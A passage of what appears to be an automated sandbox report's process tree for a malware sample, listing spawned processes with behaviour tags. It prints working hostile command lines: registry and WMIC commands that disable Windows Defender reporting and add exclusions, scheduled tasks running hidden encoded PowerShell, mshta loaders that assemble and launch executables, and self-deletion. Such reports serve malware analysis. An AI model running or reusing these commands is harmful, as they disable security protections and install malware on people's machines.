                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                13⤵
                                                                                                                  PID:5004
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "ggDJhyDKQ" /SC once /ST 00:07:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                              11⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:4944
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 00:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\wnMsciG.exe\" uG /site_id 668658 /S" /V1 /F
                                                                                                              11⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:6308
                                                                                                      • C:\Users\Admin\Documents\afjx5MK8GsPZwo2c4GDKWijZ.exe
                                                                                                        "C:\Users\Admin\Documents\afjx5MK8GsPZwo2c4GDKWijZ.exe"
                                                                                                        8⤵
                                                                                                          PID:3156
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 1940
                                                                                                            9⤵
                                                                                                            • Program crash
                                                                                                            • Checks processor information in registry
                                                                                                            • Enumerates system info in registry
                                                                                                            PID:4656
                                                                                                        • C:\Users\Admin\Documents\WIJot069Fb7R0K_RHoA7uyR2.exe
                                                                                                          "C:\Users\Admin\Documents\WIJot069Fb7R0K_RHoA7uyR2.exe"
                                                                                                          8⤵
                                                                                                            PID:2024
                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\WIJot069Fb7R0K_RHoA7uyR2.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\WIJot069Fb7R0K_RHoA7uyR2.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                                                                                                              9⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              PID:4608
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\WIJot069Fb7R0K_RHoA7uyR2.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\Documents\WIJot069Fb7R0K_RHoA7uyR2.exe" ) do taskkill -F -Im "%~nXU"
                                                                                                                10⤵
                                                                                                                  PID:2508
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    11⤵
                                                                                                                      PID:5536
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
                                                                                                                      SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                                                                                                                      11⤵
                                                                                                                        PID:7792
                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                                                                                                                          12⤵
                                                                                                                            PID:7740
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                                                                                                                              13⤵
                                                                                                                                PID:2824
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                                                                                                                              12⤵
                                                                                                                                PID:7684
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                                                                                                                                  13⤵
                                                                                                                                    PID:7836
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                                                                                                                                      14⤵
                                                                                                                                        PID:5144
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                        14⤵
                                                                                                                                          PID:3588
                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                          control .\FUEj5.QM
                                                                                                                                          14⤵
                                                                                                                                            PID:8108
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                                                                                                              15⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:7928
                                                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                                                                                                                16⤵
                                                                                                                                                  PID:2064
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                                                                                                                                                    17⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    PID:6328
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill -F -Im "WIJot069Fb7R0K_RHoA7uyR2.exe"
                                                                                                                                        11⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:4828
                                                                                                                                • C:\Users\Admin\Documents\Pqj5VnwMOtbwvXKSp9BgwH7n.exe
                                                                                                                                  "C:\Users\Admin\Documents\Pqj5VnwMOtbwvXKSp9BgwH7n.exe" /mixtwo
                                                                                                                                  8⤵
                                                                                                                                    PID:1588
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 236
                                                                                                                                      9⤵
                                                                                                                                      • Program crash
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      PID:7900
                                                                                                                                  • C:\Users\Admin\Documents\sf_xVawgtBFwkldzv0s94Ex9.exe
                                                                                                                                    "C:\Users\Admin\Documents\sf_xVawgtBFwkldzv0s94Ex9.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:1160
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpDE50_tmp.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\tmpDE50_tmp.exe"
                                                                                                                                        9⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:668
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmpDE50_tmp.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\tmpDE50_tmp.exe
                                                                                                                                          10⤵
                                                                                                                                            PID:2964
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpDE50_tmp.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\tmpDE50_tmp.exe
                                                                                                                                            10⤵
                                                                                                                                              PID:6368
                                                                                                                                        • C:\Users\Admin\Documents\DfZI0oiD2nL3fwFsDuaA6wwK.exe
                                                                                                                                          "C:\Users\Admin\Documents\DfZI0oiD2nL3fwFsDuaA6wwK.exe"
                                                                                                                                          8⤵
                                                                                                                                            PID:4728
                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Documents\DfZI0oiD2nL3fwFsDuaA6wwK.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\Admin\Documents\DfZI0oiD2nL3fwFsDuaA6wwK.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
                                                                                                                                              9⤵
                                                                                                                                                PID:6824
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Documents\DfZI0oiD2nL3fwFsDuaA6wwK.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\Admin\Documents\DfZI0oiD2nL3fwFsDuaA6wwK.exe" ) do taskkill /f -Im "%~nXw"
                                                                                                                                                  10⤵
                                                                                                                                                    PID:4300
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /f -Im "DfZI0oiD2nL3fwFsDuaA6wwK.exe"
                                                                                                                                                      11⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:7396
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE
                                                                                                                                                      ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd
                                                                                                                                                      11⤵
                                                                                                                                                        PID:6520
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
                                                                                                                                                          12⤵
                                                                                                                                                            PID:7056
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
                                                                                                                                                              13⤵
                                                                                                                                                                PID:4020
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
                                                                                                                                                              12⤵
                                                                                                                                                                PID:5256
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:6012
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      14⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:6552
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
                                                                                                                                                                      14⤵
                                                                                                                                                                        PID:7348
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                                                                                                        14⤵
                                                                                                                                                                          PID:5956
                                                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                          control.exe ..\QVNGP.I
                                                                                                                                                                          14⤵
                                                                                                                                                                            PID:6652
                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I
                                                                                                                                                                              15⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:6456
                                                                                                                                                                              • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I
                                                                                                                                                                                16⤵
                                                                                                                                                                                  PID:4280
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I
                                                                                                                                                                                    17⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:7716
                                                                                                                                                                • C:\Users\Admin\Documents\qLNMCneqU5qAsSg7dO7mZWif.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\qLNMCneqU5qAsSg7dO7mZWif.exe"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:2832
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 240
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      PID:7876
                                                                                                                                                                  • C:\Users\Admin\Documents\SHPWOopzm2t712CJuKpsqL5t.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\SHPWOopzm2t712CJuKpsqL5t.exe" silent
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    PID:2632
                                                                                                                                                                  • C:\Users\Admin\Documents\BTGZom4QlZEXsIucSRYVtHW5.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\BTGZom4QlZEXsIucSRYVtHW5.exe"
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:6048
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-L3R7T.tmp\BTGZom4QlZEXsIucSRYVtHW5.tmp
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-L3R7T.tmp\BTGZom4QlZEXsIucSRYVtHW5.tmp" /SL5="$703CA,506127,422400,C:\Users\Admin\Documents\BTGZom4QlZEXsIucSRYVtHW5.exe"
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:5396
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-JCQNQ.tmp\Sharefolder.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-JCQNQ.tmp\Sharefolder.exe" /S /UID=2709
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:1340
                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                              dw20.exe -x -s 2116
                                                                                                                                                                              11⤵
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              PID:3940
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:5540
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:1736
                                                                                                                                                                  • C:\Users\Admin\Documents\g91aEHAgxj4Hw_xolfJ_bxYw.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\g91aEHAgxj4Hw_xolfJ_bxYw.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:6364
                                                                                                                                                                    • C:\Users\Admin\Documents\g91aEHAgxj4Hw_xolfJ_bxYw.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\g91aEHAgxj4Hw_xolfJ_bxYw.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      PID:2564
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im g91aEHAgxj4Hw_xolfJ_bxYw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\g91aEHAgxj4Hw_xolfJ_bxYw.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:5804
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /im g91aEHAgxj4Hw_xolfJ_bxYw.exe /f
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:6700
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout /t 6
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:6268
                                                                                                                                                                      • C:\Users\Admin\Documents\g91aEHAgxj4Hw_xolfJ_bxYw.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\g91aEHAgxj4Hw_xolfJ_bxYw.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5680
                                                                                                                                                                      • C:\Users\Admin\Documents\Wz1cZPGSxEA0sMbgco7eeCr4.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\Wz1cZPGSxEA0sMbgco7eeCr4.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:6608
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4800.tmp\Install.exe
                                                                                                                                                                          .\Install.exe
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:7136
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS73B4.tmp\Install.exe
                                                                                                                                                                              .\Install.exe /S /site_id "394347"
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                              PID:2460
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:7972
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:6396
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:1276
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                            12⤵
                                                                                                                                                                                              PID:6568
                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:404
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:7252
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:7232
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:3472
                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:7324
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:7084
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                          PID:4532
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                              PID:5504
                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                  PID:4012
                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:5408
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:416
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                      PID:492
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                          PID:5644
                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:5408
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
